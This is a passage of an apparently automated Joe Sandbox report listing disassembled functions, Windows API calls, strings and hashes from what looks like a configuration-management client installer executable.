                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: BlanketProxy$Query
                                                                                          • String ID:
                                                                                          • API String ID: 1095777928-3916222277
                                                                                          • Opcode ID: 6824fa5a3fa569d35b0b25c5599041f9307a5e7d25028641b527ac0d7902f54c
                                                                                          • Instruction ID: ccfeacb37404bf03bd17af625455733942b920e535048f5974934b8deedb346d
                                                                                          • Opcode Fuzzy Hash: 6824fa5a3fa569d35b0b25c5599041f9307a5e7d25028641b527ac0d7902f54c
                                                                                          • Instruction Fuzzy Hash: A8010872905128BADF218E85DC09FEFBFBDEF06360F104255B925A51E0D7715A14DAA0
                                                                                          Function 005FB9EB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005FB9F2
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005EC14B: __EH_prolog3_catch.LIBCMT ref: 005EC152
                                                                                            • Part of subcall function 005EC14B: GetCurrentThreadId.KERNEL32 ref: 005EC1A3
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$H_prolog3$CloseCurrentThread
                                                                                          • String ID: EnableManagedInstaller$Software\Microsoft\CCM
                                                                                          • API String ID: 2320626325-1782075465
                                                                                          • Opcode ID: d7910766122c0cfbd6fce5608242fda184162bc1d9f6f5802e73078dac333491
                                                                                          • Instruction ID: 6459c8a735feb11602277d7e69ed4a5181275220c17b05e7023fc933977bcb35
                                                                                          • Opcode Fuzzy Hash: d7910766122c0cfbd6fce5608242fda184162bc1d9f6f5802e73078dac333491
                                                                                          • Instruction Fuzzy Hash: 0211277080024EDAEF14EFA4C98AAEDBF70BF24304F50446DE680A7192EBB95B04C750
                                                                                          Function 00595265 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID: No valid source or MP locations$Fl
                                                                                          • API String ID: 2826327444-248654557
                                                                                          • Opcode ID: 88464f058fc18fc0207f658a533587e436977d0b3f26b5c1bd3b85f7b47723af
                                                                                          • Instruction ID: 210e74745afbfcf269716960556278a0702c4e3a649b3e580adcff0a4116f6ac
                                                                                          • Opcode Fuzzy Hash: 88464f058fc18fc0207f658a533587e436977d0b3f26b5c1bd3b85f7b47723af
                                                                                          • Instruction Fuzzy Hash: CA31BC31A44358EAEF25DA90CD5ABDDBB70AB51704F6044DAE6047B1C1DBB02F84CF51
                                                                                          Function 0057C735 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0057C73C
                                                                                            • Part of subcall function 0061FEB6: __EH_prolog3_catch_GS.LIBCMT ref: 0061FEC0
                                                                                            • Part of subcall function 005C948C: __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005C948C: GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          Strings
                                                                                          • ClientDeploymentErrorCode, xrefs: 0057C758
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_H_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: ClientDeploymentErrorCode
                                                                                          • API String ID: 109395747-638181262
                                                                                          • Opcode ID: eb2263c0aa9bbb292a45f319a4f92d74c56ab3c3757db4110506544e256126f5
                                                                                          • Instruction ID: 8e61f484ac8504260c515c6315a7789da48a764bfc1b3b523abd39d55c0861b6
                                                                                          • Opcode Fuzzy Hash: eb2263c0aa9bbb292a45f319a4f92d74c56ab3c3757db4110506544e256126f5
                                                                                          • Instruction Fuzzy Hash: 2F015B7290024DEEDB04EBE48D96EEEBA38BB54750F44015AF211672C2EBB05F45CB61
                                                                                          Function 005AE2E1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AE2E8
                                                                                          Strings
                                                                                          • GetProductInstalledByUpgradeCode, xrefs: 005AE30D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_
                                                                                          • String ID: GetProductInstalledByUpgradeCode
                                                                                          • API String ID: 1329019490-594391790
                                                                                          • Opcode ID: 6dbd9b18937dd1f9766b08a05848318cdca5a898eea7c94af1fe22758552c742
                                                                                          • Instruction ID: 58524f966f38fae58b7bd429075dd417870395dd9e7cbc7f6abd3c8c183c4224
                                                                                          • Opcode Fuzzy Hash: 6dbd9b18937dd1f9766b08a05848318cdca5a898eea7c94af1fe22758552c742
                                                                                          • Instruction Fuzzy Hash: D0018871A0138DEEDF11DFB888869DD7FB9BF51314F14446EB4456B282C6345E44C761
                                                                                          Function 0062F296 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CertFreeCertificateContext.CRYPT32(?,00000000,007E2C84,?,00000001,?,005A2AB0,032FCDE0,005805BD,00000001,00000000,00000001,00000000,?,?,?), ref: 0062F30B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CertCertificateContextFree
                                                                                          • String ID: personal
                                                                                          • API String ID: 3080675121-4052381060
                                                                                          • Opcode ID: bf45c60d5ddcdbbdbf2e70bed38bfa3229be66fe7a5f29d739e4ceaaafe1dab2
                                                                                          • Instruction ID: 2518a985efaf120eb87a9519d75500536f120e54fd63db23d8e2e528025b4a34
                                                                                          • Opcode Fuzzy Hash: bf45c60d5ddcdbbdbf2e70bed38bfa3229be66fe7a5f29d739e4ceaaafe1dab2
                                                                                          • Instruction Fuzzy Hash: BEF0F434208B64AADF10ABB5AC08BDB3EDF9B15350F040035F944C6252EB78C941CFA6
                                                                                          Function 00615949 Relevance: 3.0, APIs: 2, Instructions: 41memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000,?,00000000,?,?,0059F0FF,00000001,8007000E,009052F0,00000000,00000000,00000001), ref: 00615970
                                                                                          • RtlAllocateHeap.NTDLL(0093A01C,00000008,00000000,00000000,?,00000000,?,?,0059F0FF,00000001,8007000E,009052F0,00000000,00000000,00000001,00000000), ref: 0061598D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocAllocateHeapVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 1838633152-0
                                                                                          • Opcode ID: 13995321349313b1bdceaebd38fd96ecd3b180b46cfc7f0a4d7f64dd23d6742c
                                                                                          • Instruction ID: 2d87547990666d1de0c28056a66bf72d7ab8982430379394d617894c145c13b0
                                                                                          • Opcode Fuzzy Hash: 13995321349313b1bdceaebd38fd96ecd3b180b46cfc7f0a4d7f64dd23d6742c
                                                                                          • Instruction Fuzzy Hash: BFF0F672701350FBD7115B269C04FEBBE5ADBC57B1F08442AF94ADB210CA62888296A1
                                                                                          Function 006159AA Relevance: 3.0, APIs: 2, Instructions: 27memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(0093A01C,00000000,-000000F8,0093A01C,0093A01C,?,0059EF40,?,?,?,?,?,0059EAD0,00000001,?), ref: 006159D5
                                                                                          • VirtualFree.KERNEL32(-000000F8,00000000,00008000,0093A01C,0093A01C,?,0059EF40,?,?,?,?,?,0059EAD0,00000001,?), ref: 006159E5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$HeapVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 3783212868-0
                                                                                          • Opcode ID: aef897074833661b97ab767d3e109b4f77f69d1e708bc12b016e2ea9338fbe2e
                                                                                          • Instruction ID: 920c280ab410c0a7871ce06151b893f988c9ebbafcb204cca29947c416a31c3a
                                                                                          • Opcode Fuzzy Hash: aef897074833661b97ab767d3e109b4f77f69d1e708bc12b016e2ea9338fbe2e
                                                                                          • Instruction Fuzzy Hash: BCE0ED70100640EBD3208F25CC06FA6F76BEBC1B30F2C830AB9214A2D0E671AC80DA69
                                                                                          Function 005D4DBF Relevance: 3.0, APIs: 2, Instructions: 7COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___crtCorExitProcess.LIBCMT ref: 005D4DC5
                                                                                            • Part of subcall function 005D4D8B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,005D4DCA,?,?,005D1F6E,000000FF,0000001E,00000000,00000000,00000000,?,005D511B), ref: 005D4D9A
                                                                                            • Part of subcall function 005D4D8B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 005D4DAC
                                                                                          • ExitProcess.KERNEL32 ref: 005D4DCE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                          • String ID:
                                                                                          • API String ID: 2427264223-0
                                                                                          • Opcode ID: 9bf48e17d74e942a104197dd906658fdf7d73310c5af62613056c31a58e8d3fc
                                                                                          • Instruction ID: d0c5c85c965e3f37ad0fb766239cebe2a6fa4036caba5187e0a992ff5d61c1ea
                                                                                          • Opcode Fuzzy Hash: 9bf48e17d74e942a104197dd906658fdf7d73310c5af62613056c31a58e8d3fc
                                                                                          • Instruction Fuzzy Hash: 09B09230000108BBDB053F15DC0A8583F2EEB00A91B005126F80409171DB72AA929ED1
                                                                                          Function 0059E813 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch
                                                                                          • String ID:
                                                                                          • API String ID: 3886170330-0
                                                                                          • Opcode ID: 4b357887d472ea843845e25d15c824a6847d432b8f843aa98425d246ebec500f
                                                                                          • Instruction ID: e2ae36d7a7ee0bf55c297371286e5be075272881251ea83431c19291a01f5d33
                                                                                          • Opcode Fuzzy Hash: 4b357887d472ea843845e25d15c824a6847d432b8f843aa98425d246ebec500f
                                                                                          • Instruction Fuzzy Hash: 78216571A10205EBDF28EFA5C8969BEBBA9FF84710B50411DF51597285DB30AA40C7A4
                                                                                          Function 0059F078 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 0059F0C8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID:
                                                                                          • API String ID: 2005118841-0
                                                                                          • Opcode ID: 78f36f90a496a208da15daac60d845234e8b03199c10ee0b622d122276a31748
                                                                                          • Instruction ID: d428c48ddfef278a203d9e7a371ebbfe2e7f6d35dba9a65386e35f5a0ea96f0a
                                                                                          • Opcode Fuzzy Hash: 78f36f90a496a208da15daac60d845234e8b03199c10ee0b622d122276a31748
                                                                                          • Instruction Fuzzy Hash: 7FF0827290010FABCF14EEA4DD0AEAF7B7CAB80304F5040647A05E1152EA61DA20D7A1
                                                                                          Function 00615355 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0061535C
                                                                                            • Part of subcall function 00619E0D: GetSystemInfo.KERNEL32(?), ref: 00619E30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3InfoSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1451917602-0
                                                                                          • Opcode ID: b275946e12b92dc6f588cdd017c970f5c125c8ddff28bed907cabb9b3a6bc5c9
                                                                                          • Instruction ID: 73aa7bba86072ccbefe87e87bf4736e9c2c0d4ebc2a2b74ca271315a0f7cc12a
                                                                                          • Opcode Fuzzy Hash: b275946e12b92dc6f588cdd017c970f5c125c8ddff28bed907cabb9b3a6bc5c9
                                                                                          • Instruction Fuzzy Hash: B5F0C4B0901B068FC7B0DF39C04069ABBF1BF48750B148A2EA0AACBB40E730A6448B44
                                                                                          Function 00619E0D Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSystemInfo.KERNEL32(?), ref: 00619E30
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoSystem
                                                                                          • String ID:
                                                                                          • API String ID: 31276548-0
                                                                                          • Opcode ID: 60323ce5d7024ea7afcad7d3ffaf6f1267826893e30ab7f3d42c8ec2a3b0cefe
                                                                                          • Instruction ID: dcef953d506717f46b155da56e8a732a7693d73d4f49abb1390a9bcab66ace8c
                                                                                          • Opcode Fuzzy Hash: 60323ce5d7024ea7afcad7d3ffaf6f1267826893e30ab7f3d42c8ec2a3b0cefe
                                                                                          • Instruction Fuzzy Hash: DFE0C23591422847C714ABBCA8085E973EDEB4E322F000076EC19D3310E973DC828FE2
                                                                                          Function 00577FD4 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00577FDB
                                                                                            • Part of subcall function 005775C6: __EH_prolog3.LIBCMT ref: 005775CD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
